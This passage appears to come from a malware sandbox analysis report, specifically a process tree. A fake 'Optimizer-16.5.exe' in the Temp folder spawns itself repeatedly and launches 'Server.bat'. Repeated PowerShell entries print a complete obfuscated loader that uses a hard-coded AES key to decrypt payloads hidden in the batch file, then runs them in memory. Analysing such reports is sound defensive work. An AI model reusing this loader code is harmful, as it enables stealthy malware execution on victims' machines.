        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        103⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        104⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        105⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        106⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        107⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        108⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        109⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        110⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        111⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        112⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        113⤵
        
        PID:340
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        114⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        115⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        116⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        117⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        118⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        119⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        120⤵
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        121⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        122⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        123⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        124⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        125⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        126⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        127⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        128⤵
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        129⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        130⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        131⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        132⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        133⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        134⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        135⤵
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        136⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        137⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        138⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        139⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        140⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        141⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        142⤵
        
        PID:328
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        143⤵
        
        PID:1724
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        143⤵
        
        PID:604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        144⤵
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        142⤵
        
        PID:2140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        143⤵
        
        PID:1916
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        141⤵
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        142⤵
        
        PID:1696
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        140⤵
        
        PID:1228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        141⤵
        
        PID:940
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        139⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        140⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2020
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        138⤵
        
        PID:2560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        139⤵
        
        PID:2228
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        137⤵
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        138⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1428
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        136⤵
        
        PID:2544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        137⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2484
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        135⤵
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        136⤵
        
        PID:2116
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        134⤵
        
        PID:2932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
